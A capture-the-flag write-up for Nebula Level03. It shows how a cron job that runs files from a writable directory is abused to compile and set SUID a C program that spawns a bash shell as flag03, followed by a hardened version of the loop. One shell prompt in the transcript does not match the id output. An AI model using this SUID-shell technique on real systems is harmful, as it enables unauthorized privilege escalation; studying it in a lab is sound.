
The details page for Level03 contains a hint directing us to the home directory of flag03. After navigating to the target home directory and listing out the files, I was presented with a shell script called writable.sh and a directory called writable.d.

I took a look at the shell script and it contained the following:


	for i in /home/flag03/writable.d/* ; do
		(ulimit -t 5; bash -x "$i")
		rm -f "$i"
	done

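This loop runs every file in the writable.d directory with bash -x, limited to five seconds of CPU time by ulimit -t 5, and then deletes the file. The details section also mentioned a crontab that is called every couple of minutes, so anything placed in writable.d gets executed on the next cron run.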

This challenge was a little tougher because I wanted to gain shell access and not just cat out a log file that contained the getflag output. After trying to approach the problem the same way as Level00, I came up short because bash will ignore the SUID bit.

I went with a different approach: after grabbing the uid/gid from /etc/passwd, I created some code to spawn a shell.

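	#define _GNU_SOURCE	/* exposes setresuid/setresgid in unistd.h */
	#include <stdio.h>
	#include <stdlib.h>	/* system */
	#include <unistd.h>	/* setresuid, setresgid */

	int main(void)
	{
		/* 996 is the uid/gid of flag03 taken from /etc/passwd */
		setresuid(996, 996, 996);
		setresgid(996, 996, 996);
		system("/bin/bash");
		return 0;
	}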

Then, I placed a bash script in writable.d that will compile my code.


	gcc /tmp/foo.c -o /home/flag03/level03
	chmod +xs /home/flag03/level03

I waited for cron to run, then moved to /home/flag03 and executed my newly compiled level03 program.

	level04@nebula:/home/flag03$ id
	uid=1004(level03) gid=1004(level03) groups=1004(level03)
	level03@nebula:/home/flag03$ ./level03
	flag03@nebula:/home/flag03$ id
	uid=996(flag03) gid=996(flag03) groups=996(flag03),1004(level03)
	flag03@nebula:/home/flag03$ getflag
	You have successfully executed getflag on a target account

Success! After running the program I was presented with a shell and able to run getflag on a target account.
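
The root cause is that writable.sh executes whatever it finds in a directory other users can write to. A hardened version of that loop, as an added example (not from the original post or the Nebula image): it refuses to run unless the directory and each file are owned by the expected account and are not group- or world-writable. The function names and the uid argument are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example (not the Nebula script): run drop-in scripts only when
# neither the directory nor the file could have been written by another user.
# The uid passed in is an assumed setting: the account the cron job runs as.

# trusted_path TYPE PATH UID -> 0 if PATH is of TYPE (f or d), owned by UID,
# and not group- or world-writable. find does not follow symlinks by default,
# so a symlink planted in the directory fails the -type test.
trusted_path() {
    [ -n "$(find "$2" -prune -type "$1" -user "$3" \
              ! -perm -020 ! -perm -002 -print 2>/dev/null)" ]
}

# run_dropins DIR UID -> runs trusted scripts and echoes how many it executed.
# The directory check is the key control: if nobody else can write to DIR,
# nobody else can add or swap a file between the check and the execution.
run_dropins() {
    dir=$1 uid=$2 ran=0
    if ! trusted_path d "$dir" "$uid"; then
        echo "refusing: $dir is not owned by uid $uid or is writable by others" >&2
        return 1
    fi
    for f in "$dir"/*; do
        [ -e "$f" ] || [ -L "$f" ] || continue    # unmatched glob: empty directory
        if trusted_path f "$f" "$uid"; then
            (ulimit -t 5; sh "$f") >/dev/null 2>&1 || echo "failed: $f" >&2
            ran=$((ran + 1))
        else
            echo "skipped untrusted file: $f" >&2  # left in place for review
        fi
    done
    echo "$ran"
}
```

Unlike the original loop, untrusted files are reported and left in place rather than executed and deleted, so they remain available as evidence.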

Thanks for reading!

